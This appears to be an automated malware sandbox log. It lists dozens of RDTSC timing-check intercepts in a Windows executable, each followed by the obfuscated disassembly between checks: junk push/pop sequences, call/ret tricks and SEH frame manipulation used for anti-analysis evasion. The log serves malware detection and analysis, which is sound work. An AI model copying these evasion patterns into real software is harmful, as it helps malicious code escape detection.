Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98A5EC second address: 98A5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98A8C0 second address: 98A8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98A8C4 second address: 98A8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D074 second address: 98D0F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F77004F22C5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F77004F22B8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b sub edx, dword ptr [ebp+122D2AD0h] 0x00000031 call 00007F77004F22B9h 0x00000036 jmp 00007F77004F22C5h 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007F77004F22B8h 0x00000043 pushad 0x00000044 popad 0x00000045 pop edx 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a pushad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D0F1 second address: 98D0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D26E second address: 98D272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D272 second address: 98D276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D276 second address: 98D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D27C second address: 98D2C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2C70h] 0x00000012 mov ch, ABh 0x00000014 push 00000000h 0x00000016 add cx, DC40h 0x0000001b call 00007F77012B90E9h 0x00000020 pushad 0x00000021 push edi 0x00000022 jno 00007F77012B90E6h 0x00000028 pop edi 0x00000029 jmp 00007F77012B90EFh 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D2C7 second address: 98D2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D2CB second address: 98D302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f jmp 00007F77012B90F8h 0x00000014 pop edi 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D302 second address: 98D311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F77004F22B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D311 second address: 98D339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f je 00007F77012B90ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D339 second address: 98D376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 jmp 00007F77004F22C6h 0x0000000b push 00000003h 0x0000000d mov edx, dword ptr [ebp+122D29D0h] 0x00000013 push 00000000h 0x00000015 movsx esi, dx 0x00000018 push 00000003h 0x0000001a movzx edx, di 0x0000001d push BF46E97Ch 0x00000022 pushad 0x00000023 pushad 0x00000024 jnl 00007F77004F22B6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D376 second address: 98D37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D472 second address: 98D476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D476 second address: 98D480 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77012B90E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98D480 second address: 98D535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F77004F22BEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jne 00007F77004F22BCh 0x00000014 push 00000000h 0x00000016 stc 0x00000017 push 9DCE79F8h 0x0000001c jmp 00007F77004F22BDh 0x00000021 add dword ptr [esp], 62318688h 0x00000028 mov ecx, dword ptr [ebp+122D2B68h] 0x0000002e mov dword ptr [ebp+122D32A9h], ecx 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F77004F22B8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov edx, dword ptr [ebp+122D2B68h] 0x00000058 push 00000003h 0x0000005a sub dword ptr [ebp+122D18CEh], edx 0x00000060 push AE6C67CAh 0x00000065 jmp 00007F77004F22BFh 0x0000006a add dword ptr [esp], 11939836h 0x00000071 adc esi, 62FDFA2Dh 0x00000077 lea ebx, dword ptr [ebp+12443ED2h] 0x0000007d mov dword ptr [ebp+122D319Eh], edi 0x00000083 push eax 0x00000084 push ebx 0x00000085 pushad 0x00000086 jnp 00007F77004F22B6h 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD0A3 second address: 9AD0AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F77012B90E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD234 second address: 9AD238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD238 second address: 9AD248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD639 second address: 9AD63D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD63D second address: 9AD670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnl 00007F77012B90E6h 0x00000014 ja 00007F77012B90E6h 0x0000001a popad 0x0000001b pop ecx 0x0000001c jbe 00007F77012B90F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AD670 second address: 9AD674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9ADDC9 second address: 9ADDCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9ADDCD second address: 9ADDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77004F22C0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9ADDE3 second address: 9ADDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9ADDEA second address: 9ADDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9ADDF2 second address: 9ADE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F77012B90E6h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F77012B90ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE0B9 second address: 9AE0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE0BF second address: 9AE0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE0C3 second address: 9AE0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F77004F22B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F77004F22B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE0D7 second address: 9AE0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9A15FA second address: 9A15FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE230 second address: 9AE237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE237 second address: 9AE246 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F77004F22BAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE969 second address: 9AE96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AE96E second address: 9AE98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F77004F22B6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9AEAD7 second address: 9AEADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9B4CC2 second address: 9B4CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F77004F22B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9B4CCD second address: 9B4CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9B4CEA second address: 9B4D11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F77004F22C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F77004F22B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98426A second address: 984270 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9B8C1A second address: 9B8C52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F77004F22C6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F77004F22C4h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BCA2B second address: 9BCA59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 73256127h 0x0000000d pushad 0x0000000e add ecx, dword ptr [ebp+122D2950h] 0x00000014 mov dword ptr [ebp+1245DADDh], eax 0x0000001a popad 0x0000001b call 00007F77012B90E9h 0x00000020 jo 00007F77012B90F0h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BCA59 second address: 9BCAA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F77004F22C7h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F77004F22BAh 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F77004F22BFh 0x00000024 jg 00007F77004F22B6h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BCAA0 second address: 9BCAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BD197 second address: 9BD19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BEB77 second address: 9BEC0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F77012B90ECh 0x00000010 nop 0x00000011 movsx esi, ax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F77012B90E8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F77012B90E8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xor dword ptr [ebp+122D2338h], ecx 0x00000052 jnp 00007F77012B90E9h 0x00000058 movzx esi, bx 0x0000005b jmp 00007F77012B90F7h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jl 00007F77012B90E6h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BEC0D second address: 9BEC13 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BF401 second address: 9BF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C1D3B second address: 9C1D45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77004F22B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C1D45 second address: 9C1D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C3194 second address: 9C319A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C45EB second address: 9C45EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C45EF second address: 9C45F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C5A45 second address: 9C5A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C5FAB second address: 9C5FFB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F77004F22B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+12441B95h], esi 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+124478CFh], eax 0x0000001b call 00007F77004F22C6h 0x00000020 mov ebx, dword ptr [ebp+122D3935h] 0x00000026 pop ebx 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a mov dword ptr [ebp+12470BA9h], esi 0x00000030 xor ebx, dword ptr [ebp+122D2529h] 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C5FFB second address: 9C6010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C7089 second address: 9C70F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnl 00007F77004F22B6h 0x00000017 popad 0x00000018 pop edi 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D1805h], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F77004F22B8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c push 00000000h 0x0000003e jmp 00007F77004F22C9h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F77004F22C2h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C70F9 second address: 9C712C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F77012B90F4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F77012B90F2h 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C9059 second address: 9C905E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C6152 second address: 9C6166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C92F6 second address: 9C9358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D18A8h], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push eax 0x0000001a add edi, dword ptr [ebp+122D2BC8h] 0x00000020 pop ebx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 call 00007F77004F22C4h 0x0000002d mov dword ptr [ebp+1244325Eh], ebx 0x00000033 pop ebx 0x00000034 mov eax, dword ptr [ebp+122D123Dh] 0x0000003a sub dword ptr [ebp+122D33AEh], ecx 0x00000040 push FFFFFFFFh 0x00000042 cmc 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C9358 second address: 9C935C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CB25C second address: 9CB262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C935C second address: 9C9374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CB262 second address: 9CB284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9C9374 second address: 9C9392 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F77012B90E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77012B90EFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CC62F second address: 9CC639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F77004F22B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CC639 second address: 9CC6EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F77012B90F7h 0x00000011 nop 0x00000012 mov edi, esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b call 00007F77012B90F6h 0x00000020 mov ebx, dword ptr [ebp+122D3167h] 0x00000026 pop edi 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov bh, 2Eh 0x00000030 cmc 0x00000031 mov eax, dword ptr [ebp+122D015Dh] 0x00000037 mov ebx, 47A49FDAh 0x0000003c push FFFFFFFFh 0x0000003e push ebx 0x0000003f mov dword ptr [ebp+1244896Fh], ecx 0x00000045 pop edi 0x00000046 nop 0x00000047 push edx 0x00000048 pushad 0x00000049 jmp 00007F77012B90F6h 0x0000004e jmp 00007F77012B90F6h 0x00000053 popad 0x00000054 pop edx 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F77012B90ECh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CF17E second address: 9CF1A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D010B second address: 9D0115 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
